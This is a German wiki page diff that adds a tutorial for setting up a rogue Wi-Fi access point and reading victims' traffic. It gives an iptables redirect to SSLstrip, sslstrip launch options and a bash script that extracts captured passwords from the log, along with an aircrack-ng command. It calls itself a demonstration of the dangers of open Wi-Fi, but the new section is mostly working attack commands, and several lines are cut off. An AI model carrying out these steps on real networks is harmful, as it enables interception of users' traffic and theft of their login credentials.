backtrack-tutorials
Unterschiede
Hier werden die Unterschiede zwischen zwei Versionen angezeigt.
| Beide Seiten der vorigen RevisionVorhergehende ÜberarbeitungNächste Überarbeitung | Vorhergehende Überarbeitung | ||
| backtrack-tutorials [2012/09/17 23:54] – [Titel 2] tom | backtrack-tutorials [2025/05/03 09:10] (aktuell) – Externe Bearbeitung 127.0.0.1 | ||
|---|---|---|---|
| Zeile 144: | Zeile 144: | ||
| aircrack-ng -b 00:00:..... < | aircrack-ng -b 00:00:..... < | ||
| | | ||
| - | ====== Titel 1 ====== | + | |
| ===== AccessPoint erstellen ===== | ===== AccessPoint erstellen ===== | ||
| Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können. | Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können. | ||
| - | === Links === | + | ==== Links ==== |
| [[http:// | [[http:// | ||
| Zeile 156: | Zeile 156: | ||
| [[http:// | [[http:// | ||
| + | [[http:// | ||
| + | |||
| + | [[http:// | ||
| + | dhcpd.conf und iptables sehen interessant aus | ||
| + | |||
| + | [[http:// | ||
| + | User mit Metasploit überwachen | ||
| + | |||
| + | [[http:// | ||
| + | |||
| + | [[http:// | ||
| + | [[http:// | ||
| - | === Tutorial === | + | ==== Tutorial |
| Als erstes installieren wir den dhcp Server:\\ | Als erstes installieren wir den dhcp Server:\\ | ||
| nach dieser Vorlage [[http:// | nach dieser Vorlage [[http:// | ||
| Zeile 231: | Zeile 243: | ||
| echo 0 > / | echo 0 > / | ||
| airmon-ng stop mon0 | airmon-ng stop mon0 | ||
| + | ==== Tutorial Rogue AP auslesen ==== | ||
| + | Jetzt wo der Server läuft können wir uns daran machen, den Verkehr auszulesen. Dazu müssen wir als erstes SSLstrip installieren: | ||
| + | $ cd / | ||
| + | $ python setup.py install | ||
| + | Iptables für SSLstrip | ||
| + | $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | ||
| + | |||
| + | SSLstrip starten mit folgenden Optionen: | ||
| + | $ sslstrip -a -f -k -w / | ||
| + | diese Datei ist riesig und mit vielen Informationen bestückt. Damit wir nur die relevanten Daten erhalten, bauen wir uns ein Skript mit folgendem Inhalt: | ||
| + | |||
| + | #!/bin/bash | ||
| + | echo "Do you want to save passwords to a file? (Y=keep)" | ||
| + | echo "(If you want to keep it, it will be saved in / | ||
| + | read -e keeppd | ||
| + | if [[ $keeppd = " | ||
| + | cat / | ||
| + | awk -F "&" | ||
| + | awk -F "&" | ||
| + | egrep -a -i " | ||
| + | awk -F " | ||
| + | if [ -f "/ | ||
| + | echo " | ||
| + | else echo "Error while saving passwords" | ||
| + | fi | ||
| + | else echo " | ||
| + | fi | ||
| + | rm / | ||
| + | echo -e " | ||
| + | Das Skript kann noch angepasst werden. Danach das Skript ausführbar machen: | ||
| + | $ chmod +x Skript.sh | ||
| + | und starten (Abfrage mit " | ||
backtrack-tutorials.1347918846.txt.gz · Zuletzt geändert: 2025/05/03 09:09 (Externe Bearbeitung)